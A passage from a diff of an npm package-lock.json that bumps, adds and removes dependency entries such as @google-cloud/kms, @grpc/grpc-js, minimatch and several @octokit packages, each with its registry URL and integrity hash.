[ - { - "type": "github", - "url": "https://github.com/sponsors/NaturalIntelligence" - } - ], - "license": "MIT", - "dependencies": { - "fast-xml-builder": "^1.1.4", - "path-expression-matcher": "^1.2.0", - "strnum": "^2.2.0" - }, - "bin": { - "fxparser": "src/cli/cli.js" - } - }, "node_modules/@aws/lambda-invoke-store": { "version": "0.2.3", "resolved": "https://registry.npmjs.org/@aws/lambda-invoke-store/-/lambda-invoke-store-0.2.3.tgz", @@ -5105,6 +5178,22 @@ "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==", "dev": true }, + "node_modules/@eslint/eslintrc/node_modules/minimatch": { + "version": "9.0.9", + "resolved": 
"https://registry.npmjs.org/minimatch/-/minimatch-9.0.9.tgz", + "integrity": "sha512-OBwBN9AL4dqmETlpS2zasx+vTeWclWzkblfZk7KTA5j3jeOONz/tRCnZomUyvNg83wL5Zv9Ss6HMJXAgL8R2Yg==", + "dev": true, + "license": "ISC", + "dependencies": { + "brace-expansion": "^2.0.2" + }, + "engines": { + "node": ">=16 || 14 >=14.17" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, "node_modules/@eslint/eslintrc/node_modules/ms": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", @@ -5439,23 +5528,24 @@ } }, "node_modules/@google-cloud/kms": { - "version": "4.5.0", - "resolved": "https://registry.npmjs.org/@google-cloud/kms/-/kms-4.5.0.tgz", - "integrity": "sha512-i2vC0DI7bdfEhQszqASTw0KVvbB7HsO2CwTBod423NawAu7FWi+gVVa7NLfXVNGJaZZayFfci2Hu+om/HmyEjQ==", + "version": "5.4.0", + "resolved": "https://registry.npmjs.org/@google-cloud/kms/-/kms-5.4.0.tgz", + "integrity": "sha512-+06zUCaJM+wyZISM3F6u/jSqoBs0iZ8Aj9rqOJFePoWkNN7FbR4mQpV7okGHA+Y7caVgq+4QtIDKiFd17SZT+A==", "license": "Apache-2.0", "dependencies": { - "google-gax": "^4.0.3" + "google-gax": "^5.0.0" }, "engines": { - "node": ">=14.0.0" + "node": ">=18" } }, "node_modules/@grpc/grpc-js": { - "version": "1.12.2", - "resolved": "https://registry.npmjs.org/@grpc/grpc-js/-/grpc-js-1.12.2.tgz", - "integrity": "sha512-bgxdZmgTrJZX50OjyVwz3+mNEnCTNkh3cIqGPWVNeW9jX6bn1ZkU80uPd+67/ZpIJIjRQ9qaHCjhavyoWYxumg==", + "version": "1.14.3", + "resolved": "https://registry.npmjs.org/@grpc/grpc-js/-/grpc-js-1.14.3.tgz", + "integrity": "sha512-Iq8QQQ/7X3Sac15oB6p0FmUg/klxQvXLeileoqrTRGJYLV+/9tubbr9ipz0GKHjmXVsgFPo/+W+2cA8eNcR+XA==", + "license": "Apache-2.0", "dependencies": { - "@grpc/proto-loader": "^0.7.13", + "@grpc/proto-loader": "^0.8.0", "@js-sdsl/ordered-map": "^4.4.2" }, "engines": { @@ -5463,13 +5553,14 @@ } }, "node_modules/@grpc/proto-loader": { - "version": "0.7.13", - "resolved": "https://registry.npmjs.org/@grpc/proto-loader/-/proto-loader-0.7.13.tgz", - "integrity": 
"sha512-AiXO/bfe9bmxBjxxtYxFAXGZvMaN5s8kO+jBHAJCON8rJoB5YS/D6X7ZNc6XQkuHNmyl4CYaMI1fJ/Gn27RGGw==", + "version": "0.8.0", + "resolved": "https://registry.npmjs.org/@grpc/proto-loader/-/proto-loader-0.8.0.tgz", + "integrity": "sha512-rc1hOQtjIWGxcxpb9aHAfLpIctjEnsDehj0DAiVfBlmT84uvR0uUtN2hEi/ecvWVjXUGf5qPF4qEgiLOx1YIMQ==", + "license": "Apache-2.0", "dependencies": { "lodash.camelcase": "^4.3.0", "long": "^5.0.0", - "protobufjs": "^7.2.5", + "protobufjs": "^7.5.3", "yargs": "^17.7.2" }, "bin": { @@ -5479,118 +5570,27 @@ "node": ">=6" } }, - "node_modules/@grpc/proto-loader/node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "engines": { - "node": ">=8" - } + "node_modules/@hapi/bourne": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/@hapi/bourne/-/bourne-2.1.0.tgz", + "integrity": "sha512-i1BpaNDVLJdRBEKeJWkVO6tYX6DMFBuwMhSuWqLsY4ufeTKGVuV5rBsUhxPayXqnnWHgXUAmWK16H/ykO5Wj4Q==" }, - "node_modules/@grpc/proto-loader/node_modules/cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dependencies": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - }, + "node_modules/@hexagon/base64": { + "version": "1.1.28", + "resolved": "https://registry.npmjs.org/@hexagon/base64/-/base64-1.1.28.tgz", + "integrity": "sha512-lhqDEAvWixy3bZ+UOYbPwUbBkwBq5C1LAJ/xPC8Oi+lL54oyakv/npbA0aU2hgCsx/1NUd4IBvV03+aUBWxerw==", + "license": "MIT" + }, + "node_modules/@hono/node-server": { + "version": "1.19.14", + "resolved": "https://registry.npmjs.org/@hono/node-server/-/node-server-1.19.14.tgz", + "integrity": 
"sha512-GwtvgtXxnWsucXvbQXkRgqksiH2Qed37H9xHZocE5sA3N8O8O8/8FA3uclQXxXVzc9XBZuEOMK7+r02FmSpHtw==", + "license": "MIT", "engines": { - "node": ">=12" - } - }, - "node_modules/@grpc/proto-loader/node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" - }, - "node_modules/@grpc/proto-loader/node_modules/string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/@grpc/proto-loader/node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/@grpc/proto-loader/node_modules/wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/@grpc/proto-loader/node_modules/yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": 
"sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dependencies": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/@grpc/proto-loader/node_modules/yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "engines": { - "node": ">=12" - } - }, - "node_modules/@hapi/bourne": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/@hapi/bourne/-/bourne-2.1.0.tgz", - "integrity": "sha512-i1BpaNDVLJdRBEKeJWkVO6tYX6DMFBuwMhSuWqLsY4ufeTKGVuV5rBsUhxPayXqnnWHgXUAmWK16H/ykO5Wj4Q==" - }, - "node_modules/@hexagon/base64": { - "version": "1.1.28", - "resolved": "https://registry.npmjs.org/@hexagon/base64/-/base64-1.1.28.tgz", - "integrity": "sha512-lhqDEAvWixy3bZ+UOYbPwUbBkwBq5C1LAJ/xPC8Oi+lL54oyakv/npbA0aU2hgCsx/1NUd4IBvV03+aUBWxerw==", - "license": "MIT" - }, - "node_modules/@hono/node-server": { - "version": "1.19.12", - "resolved": "https://registry.npmjs.org/@hono/node-server/-/node-server-1.19.12.tgz", - "integrity": "sha512-txsUW4SQ1iilgE0l9/e9VQWmELXifEFvmdA1j6WFh/aFPj99hIntrSsq/if0UWyGVkmrRPKA1wCeP+UCr1B9Uw==", - "license": "MIT", - "engines": { - "node": ">=18.14.1" - }, - "peerDependencies": { - "hono": "^4" + "node": ">=18.14.1" + }, + "peerDependencies": { + "hono": "^4" } }, "node_modules/@humanwhocodes/config-array": { @@ -5624,6 +5624,22 @@ } } }, + "node_modules/@humanwhocodes/config-array/node_modules/minimatch": { + "version": "9.0.9", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.9.tgz", + "integrity": "sha512-OBwBN9AL4dqmETlpS2zasx+vTeWclWzkblfZk7KTA5j3jeOONz/tRCnZomUyvNg83wL5Zv9Ss6HMJXAgL8R2Yg==", + 
"dev": true, + "license": "ISC", + "dependencies": { + "brace-expansion": "^2.0.2" + }, + "engines": { + "node": ">=16 || 14 >=14.17" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, "node_modules/@humanwhocodes/config-array/node_modules/ms": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", @@ -6338,15 +6354,6 @@ "node": ">=18.0.0" } }, - "node_modules/@isaacs/fs-minipass/node_modules/minipass": { - "version": "7.1.3", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.3.tgz", - "integrity": "sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==", - "license": "BlueOak-1.0.0", - "engines": { - "node": ">=16 || 14 >=14.17" - } - }, "node_modules/@isaacs/ttlcache": { "version": "1.4.1", "resolved": "https://registry.npmjs.org/@isaacs/ttlcache/-/ttlcache-1.4.1.tgz", @@ -6411,6 +6418,7 @@ "version": "4.4.2", "resolved": "https://registry.npmjs.org/@js-sdsl/ordered-map/-/ordered-map-4.4.2.tgz", "integrity": "sha512-iUKgm52T8HOE/makSxjqoWhe95ZJA1/G1sYsGev2JDKUSS14KAgg1LHb+Ba+IPow0xflbnSkOsZcO08C7w1gYw==", + "license": "MIT", "funding": { "type": "opencollective", "url": "https://opencollective.com/js-sdsl" @@ -7284,6 +7292,18 @@ "url": "https://paulmillr.com/funding/" } }, + "node_modules/@nodable/entities": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/@nodable/entities/-/entities-2.1.0.tgz", + "integrity": "sha512-nyT7T3nbMyBI/lvr6L5TyWbFJAI9FTgVRakNoBqCD+PmID8DzFrrNdLLtHMwMszOtqZa8PAOV24ZqDnQrhQINA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/nodable" + } + ], + "license": "MIT" + }, "node_modules/@node-saml/node-saml": { "version": "5.1.0", "resolved": "https://registry.npmjs.org/@node-saml/node-saml/-/node-saml-5.1.0.tgz", @@ -7307,6 +7327,15 @@ "node": ">= 18" } }, + "node_modules/@node-saml/node-saml/node_modules/@xmldom/xmldom": { + "version": "0.8.12", + "resolved": 
"https://registry.npmjs.org/@xmldom/xmldom/-/xmldom-0.8.12.tgz", + "integrity": "sha512-9k/gHF6n/pAi/9tqr3m3aqkuiNosYTurLLUtc7xQ9sxB/wm7WPygCv8GYa6mS0fLJEHhqMC1ATYhz++U/lRHqg==", + "license": "MIT", + "engines": { + "node": ">=10.0.0" + } + }, "node_modules/@node-saml/node-saml/node_modules/debug": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.1.tgz", @@ -7523,32 +7552,19 @@ } }, "node_modules/@octokit/auth-app/node_modules/@octokit/request-error": { - "version": "6.1.8", - "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-6.1.8.tgz", - "integrity": "sha512-WEi/R0Jmq+IJKydWlKDmryPcmdYSVjL3ekaiEL1L9eo1sUnqMJ+grqmC9cjk7CA7+b2/T397tO5d8YLOH3qYpQ==", + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-5.1.1.tgz", + "integrity": "sha512-v9iyEQJH6ZntoENr9/yXxjuezh4My67CBSu9r6Ve/05Iu5gNgnisNWOsoJHTP6k0Rr0+HQIpnH+kyammu90q/g==", "license": "MIT", "dependencies": { - "@octokit/types": "^14.0.0" + "@octokit/types": "^13.1.0", + "deprecation": "^2.0.0", + "once": "^1.4.0" }, "engines": { "node": ">= 18" } }, - "node_modules/@octokit/auth-app/node_modules/@octokit/request-error/node_modules/@octokit/openapi-types": { - "version": "25.1.0", - "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-25.1.0.tgz", - "integrity": "sha512-idsIggNXUKkk0+BExUn1dQ92sfysJrje03Q0bv0e+KPLrvyqZF8MnBpFz8UNfYDwB3Ie7Z0TByjWfzxt7vseaA==", - "license": "MIT" - }, - "node_modules/@octokit/auth-app/node_modules/@octokit/request-error/node_modules/@octokit/types": { - "version": "14.1.0", - "resolved": "https://registry.npmjs.org/@octokit/types/-/types-14.1.0.tgz", - "integrity": "sha512-1y6DgTy8Jomcpu33N+p5w58l6xyt55Ar2I91RPiIA0xCJBXyUAhXCcmZaDWSANiha7R9a6qJJ2CRomGPZ6f46g==", - "license": "MIT", - "dependencies": { - "@octokit/openapi-types": "^25.1.0" - } - }, "node_modules/@octokit/auth-app/node_modules/@octokit/request/node_modules/@octokit/openapi-types": { 
"version": "25.1.0", "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-25.1.0.tgz", @@ -7633,32 +7649,19 @@ } }, "node_modules/@octokit/auth-oauth-app/node_modules/@octokit/request-error": { - "version": "6.1.8", - "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-6.1.8.tgz", - "integrity": "sha512-WEi/R0Jmq+IJKydWlKDmryPcmdYSVjL3ekaiEL1L9eo1sUnqMJ+grqmC9cjk7CA7+b2/T397tO5d8YLOH3qYpQ==", + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-5.1.1.tgz", + "integrity": "sha512-v9iyEQJH6ZntoENr9/yXxjuezh4My67CBSu9r6Ve/05Iu5gNgnisNWOsoJHTP6k0Rr0+HQIpnH+kyammu90q/g==", "license": "MIT", "dependencies": { - "@octokit/types": "^14.0.0" + "@octokit/types": "^13.1.0", + "deprecation": "^2.0.0", + "once": "^1.4.0" }, "engines": { "node": ">= 18" } }, - "node_modules/@octokit/auth-oauth-app/node_modules/@octokit/request-error/node_modules/@octokit/openapi-types": { - "version": "25.1.0", - "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-25.1.0.tgz", - "integrity": "sha512-idsIggNXUKkk0+BExUn1dQ92sfysJrje03Q0bv0e+KPLrvyqZF8MnBpFz8UNfYDwB3Ie7Z0TByjWfzxt7vseaA==", - "license": "MIT" - }, - "node_modules/@octokit/auth-oauth-app/node_modules/@octokit/request-error/node_modules/@octokit/types": { - "version": "14.1.0", - "resolved": "https://registry.npmjs.org/@octokit/types/-/types-14.1.0.tgz", - "integrity": "sha512-1y6DgTy8Jomcpu33N+p5w58l6xyt55Ar2I91RPiIA0xCJBXyUAhXCcmZaDWSANiha7R9a6qJJ2CRomGPZ6f46g==", - "license": "MIT", - "dependencies": { - "@octokit/openapi-types": "^25.1.0" - } - }, "node_modules/@octokit/auth-oauth-app/node_modules/@octokit/request/node_modules/@octokit/openapi-types": { "version": "25.1.0", "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-25.1.0.tgz", @@ -7734,32 +7737,19 @@ } }, "node_modules/@octokit/auth-oauth-device/node_modules/@octokit/request-error": { - "version": "6.1.8", - 
"resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-6.1.8.tgz", - "integrity": "sha512-WEi/R0Jmq+IJKydWlKDmryPcmdYSVjL3ekaiEL1L9eo1sUnqMJ+grqmC9cjk7CA7+b2/T397tO5d8YLOH3qYpQ==", + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-5.1.1.tgz", + "integrity": "sha512-v9iyEQJH6ZntoENr9/yXxjuezh4My67CBSu9r6Ve/05Iu5gNgnisNWOsoJHTP6k0Rr0+HQIpnH+kyammu90q/g==", "license": "MIT", "dependencies": { - "@octokit/types": "^14.0.0" + "@octokit/types": "^13.1.0", + "deprecation": "^2.0.0", + "once": "^1.4.0" }, "engines": { "node": ">= 18" } }, - "node_modules/@octokit/auth-oauth-device/node_modules/@octokit/request-error/node_modules/@octokit/openapi-types": { - "version": "25.1.0", - "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-25.1.0.tgz", - "integrity": "sha512-idsIggNXUKkk0+BExUn1dQ92sfysJrje03Q0bv0e+KPLrvyqZF8MnBpFz8UNfYDwB3Ie7Z0TByjWfzxt7vseaA==", - "license": "MIT" - }, - "node_modules/@octokit/auth-oauth-device/node_modules/@octokit/request-error/node_modules/@octokit/types": { - "version": "14.1.0", - "resolved": "https://registry.npmjs.org/@octokit/types/-/types-14.1.0.tgz", - "integrity": "sha512-1y6DgTy8Jomcpu33N+p5w58l6xyt55Ar2I91RPiIA0xCJBXyUAhXCcmZaDWSANiha7R9a6qJJ2CRomGPZ6f46g==", - "license": "MIT", - "dependencies": { - "@octokit/openapi-types": "^25.1.0" - } - }, "node_modules/@octokit/auth-oauth-device/node_modules/@octokit/request/node_modules/@octokit/openapi-types": { "version": "25.1.0", "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-25.1.0.tgz", @@ -7836,32 +7826,19 @@ } }, "node_modules/@octokit/auth-oauth-user/node_modules/@octokit/request-error": { - "version": "6.1.8", - "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-6.1.8.tgz", - "integrity": "sha512-WEi/R0Jmq+IJKydWlKDmryPcmdYSVjL3ekaiEL1L9eo1sUnqMJ+grqmC9cjk7CA7+b2/T397tO5d8YLOH3qYpQ==", + "version": "5.1.1", + "resolved": 
"https://registry.npmjs.org/@octokit/request-error/-/request-error-5.1.1.tgz", + "integrity": "sha512-v9iyEQJH6ZntoENr9/yXxjuezh4My67CBSu9r6Ve/05Iu5gNgnisNWOsoJHTP6k0Rr0+HQIpnH+kyammu90q/g==", "license": "MIT", "dependencies": { - "@octokit/types": "^14.0.0" + "@octokit/types": "^13.1.0", + "deprecation": "^2.0.0", + "once": "^1.4.0" }, "engines": { "node": ">= 18" } }, - "node_modules/@octokit/auth-oauth-user/node_modules/@octokit/request-error/node_modules/@octokit/openapi-types": { - "version": "25.1.0", - "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-25.1.0.tgz", - "integrity": "sha512-idsIggNXUKkk0+BExUn1dQ92sfysJrje03Q0bv0e+KPLrvyqZF8MnBpFz8UNfYDwB3Ie7Z0TByjWfzxt7vseaA==", - "license": "MIT" - }, - "node_modules/@octokit/auth-oauth-user/node_modules/@octokit/request-error/node_modules/@octokit/types": { - "version": "14.1.0", - "resolved": "https://registry.npmjs.org/@octokit/types/-/types-14.1.0.tgz", - "integrity": "sha512-1y6DgTy8Jomcpu33N+p5w58l6xyt55Ar2I91RPiIA0xCJBXyUAhXCcmZaDWSANiha7R9a6qJJ2CRomGPZ6f46g==", - "license": "MIT", - "dependencies": { - "@octokit/openapi-types": "^25.1.0" - } - }, "node_modules/@octokit/auth-oauth-user/node_modules/@octokit/request/node_modules/@octokit/openapi-types": { "version": "25.1.0", "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-25.1.0.tgz", @@ -7921,6 +7898,35 @@ "node": ">= 18" } }, + "node_modules/@octokit/auth-unauthenticated/node_modules/@octokit/openapi-types": { + "version": "24.2.0", + "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-24.2.0.tgz", + "integrity": "sha512-9sIH3nSUttelJSXUrmGzl7QUBFul0/mB8HRYl3fOlgHbIWG+WnYDXU3v/2zMtAvuzZ/ed00Ei6on975FhBfzrg==", + "license": "MIT" + }, + "node_modules/@octokit/auth-unauthenticated/node_modules/@octokit/request-error": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-5.1.1.tgz", + "integrity": 
"sha512-v9iyEQJH6ZntoENr9/yXxjuezh4My67CBSu9r6Ve/05Iu5gNgnisNWOsoJHTP6k0Rr0+HQIpnH+kyammu90q/g==", + "license": "MIT", + "dependencies": { + "@octokit/types": "^13.1.0", + "deprecation": "^2.0.0", + "once": "^1.4.0" + }, + "engines": { + "node": ">= 18" + } + }, + "node_modules/@octokit/auth-unauthenticated/node_modules/@octokit/request-error/node_modules/@octokit/types": { + "version": "13.10.0", + "resolved": "https://registry.npmjs.org/@octokit/types/-/types-13.10.0.tgz", + "integrity": "sha512-ifLaO34EbbPj0Xgro4G5lP5asESjwHracYJvVaPIyXMuiuXLlhic3S47cBdTb+jfODkTE5YtGCLt3Ay3+J97sA==", + "license": "MIT", + "dependencies": { + "@octokit/openapi-types": "^24.2.0" + } + }, "node_modules/@octokit/core": { "version": "5.2.1", "resolved": "https://registry.npmjs.org/@octokit/core/-/core-5.2.1.tgz", @@ -7945,6 +7951,20 @@ "integrity": "sha512-9sIH3nSUttelJSXUrmGzl7QUBFul0/mB8HRYl3fOlgHbIWG+WnYDXU3v/2zMtAvuzZ/ed00Ei6on975FhBfzrg==", "license": "MIT" }, + "node_modules/@octokit/core/node_modules/@octokit/request-error": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-5.1.1.tgz", + "integrity": "sha512-v9iyEQJH6ZntoENr9/yXxjuezh4My67CBSu9r6Ve/05Iu5gNgnisNWOsoJHTP6k0Rr0+HQIpnH+kyammu90q/g==", + "license": "MIT", + "dependencies": { + "@octokit/types": "^13.1.0", + "deprecation": "^2.0.0", + "once": "^1.4.0" + }, + "engines": { + "node": ">= 18" + } + }, "node_modules/@octokit/core/node_modules/@octokit/types": { "version": "13.10.0", "resolved": "https://registry.npmjs.org/@octokit/types/-/types-13.10.0.tgz", @@ -8067,32 +8087,19 @@ } }, "node_modules/@octokit/oauth-methods/node_modules/@octokit/request-error": { - "version": "6.1.8", - "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-6.1.8.tgz", - "integrity": "sha512-WEi/R0Jmq+IJKydWlKDmryPcmdYSVjL3ekaiEL1L9eo1sUnqMJ+grqmC9cjk7CA7+b2/T397tO5d8YLOH3qYpQ==", + "version": "5.1.1", + "resolved": 
"https://registry.npmjs.org/@octokit/request-error/-/request-error-5.1.1.tgz", + "integrity": "sha512-v9iyEQJH6ZntoENr9/yXxjuezh4My67CBSu9r6Ve/05Iu5gNgnisNWOsoJHTP6k0Rr0+HQIpnH+kyammu90q/g==", "license": "MIT", "dependencies": { - "@octokit/types": "^14.0.0" + "@octokit/types": "^13.1.0", + "deprecation": "^2.0.0", + "once": "^1.4.0" }, "engines": { "node": ">= 18" } }, - "node_modules/@octokit/oauth-methods/node_modules/@octokit/request-error/node_modules/@octokit/openapi-types": { - "version": "25.1.0", - "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-25.1.0.tgz", - "integrity": "sha512-idsIggNXUKkk0+BExUn1dQ92sfysJrje03Q0bv0e+KPLrvyqZF8MnBpFz8UNfYDwB3Ie7Z0TByjWfzxt7vseaA==", - "license": "MIT" - }, - "node_modules/@octokit/oauth-methods/node_modules/@octokit/request-error/node_modules/@octokit/types": { - "version": "14.1.0", - "resolved": "https://registry.npmjs.org/@octokit/types/-/types-14.1.0.tgz", - "integrity": "sha512-1y6DgTy8Jomcpu33N+p5w58l6xyt55Ar2I91RPiIA0xCJBXyUAhXCcmZaDWSANiha7R9a6qJJ2CRomGPZ6f46g==", - "license": "MIT", - "dependencies": { - "@octokit/openapi-types": "^25.1.0" - } - }, "node_modules/@octokit/oauth-methods/node_modules/@octokit/request/node_modules/@octokit/openapi-types": { "version": "25.1.0", "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-25.1.0.tgz", @@ -8150,7 +8157,36 @@ "node": ">= 18" } }, - "node_modules/@octokit/plugin-paginate-graphql": { + "node_modules/@octokit/plugin-enterprise-compatibility/node_modules/@octokit/openapi-types": { + "version": "24.2.0", + "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-24.2.0.tgz", + "integrity": "sha512-9sIH3nSUttelJSXUrmGzl7QUBFul0/mB8HRYl3fOlgHbIWG+WnYDXU3v/2zMtAvuzZ/ed00Ei6on975FhBfzrg==", + "license": "MIT" + }, + "node_modules/@octokit/plugin-enterprise-compatibility/node_modules/@octokit/request-error": { + "version": "5.1.1", + "resolved": 
"https://registry.npmjs.org/@octokit/request-error/-/request-error-5.1.1.tgz", + "integrity": "sha512-v9iyEQJH6ZntoENr9/yXxjuezh4My67CBSu9r6Ve/05Iu5gNgnisNWOsoJHTP6k0Rr0+HQIpnH+kyammu90q/g==", + "license": "MIT", + "dependencies": { + "@octokit/types": "^13.1.0", + "deprecation": "^2.0.0", + "once": "^1.4.0" + }, + "engines": { + "node": ">= 18" + } + }, + "node_modules/@octokit/plugin-enterprise-compatibility/node_modules/@octokit/request-error/node_modules/@octokit/types": { + "version": "13.10.0", + "resolved": "https://registry.npmjs.org/@octokit/types/-/types-13.10.0.tgz", + "integrity": "sha512-ifLaO34EbbPj0Xgro4G5lP5asESjwHracYJvVaPIyXMuiuXLlhic3S47cBdTb+jfODkTE5YtGCLt3Ay3+J97sA==", + "license": "MIT", + "dependencies": { + "@octokit/openapi-types": "^24.2.0" + } + }, + "node_modules/@octokit/plugin-paginate-graphql": { "version": "4.0.1", "resolved": "https://registry.npmjs.org/@octokit/plugin-paginate-graphql/-/plugin-paginate-graphql-4.0.1.tgz", "integrity": "sha512-R8ZQNmrIKKpHWC6V2gum4x9LG2qF1RxRjo27gjQcG3j+vf2tLsEfE7I/wRWEPzYMaenr1M+qDAtNcwZve1ce1A==", @@ -8224,11 +8260,12 @@ "integrity": "sha512-VRaeH8nCDtF5aXWnjPuEMIYf1itK/s3JYyJcWFJT8X9pSNnBtriDf7wlEWsGuhPLl4QIH4xM8fqTXDwJ3Mu6sw==" }, "node_modules/@octokit/plugin-retry/node_modules/@octokit/request-error": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-4.0.2.tgz", - "integrity": "sha512-uqwUEmZw3x4I9DGYq9fODVAAvcLsPQv97NRycP6syEFu5916M189VnNBW2zANNwqg3OiligNcAey7P0SET843w==", + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-5.1.1.tgz", + "integrity": "sha512-v9iyEQJH6ZntoENr9/yXxjuezh4My67CBSu9r6Ve/05Iu5gNgnisNWOsoJHTP6k0Rr0+HQIpnH+kyammu90q/g==", + "license": "MIT", "dependencies": { - "@octokit/types": "^10.0.0", + "@octokit/types": "^13.1.0", "deprecation": "^2.0.0", "once": "^1.4.0" }, @@ -8236,6 +8273,21 @@ "node": ">= 18" } }, + 
"node_modules/@octokit/plugin-retry/node_modules/@octokit/request-error/node_modules/@octokit/openapi-types": { + "version": "24.2.0", + "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-24.2.0.tgz", + "integrity": "sha512-9sIH3nSUttelJSXUrmGzl7QUBFul0/mB8HRYl3fOlgHbIWG+WnYDXU3v/2zMtAvuzZ/ed00Ei6on975FhBfzrg==", + "license": "MIT" + }, + "node_modules/@octokit/plugin-retry/node_modules/@octokit/request-error/node_modules/@octokit/types": { + "version": "13.10.0", + "resolved": "https://registry.npmjs.org/@octokit/types/-/types-13.10.0.tgz", + "integrity": "sha512-ifLaO34EbbPj0Xgro4G5lP5asESjwHracYJvVaPIyXMuiuXLlhic3S47cBdTb+jfODkTE5YtGCLt3Ay3+J97sA==", + "license": "MIT", + "dependencies": { + "@octokit/openapi-types": "^24.2.0" + } + }, "node_modules/@octokit/plugin-retry/node_modules/@octokit/types": { "version": 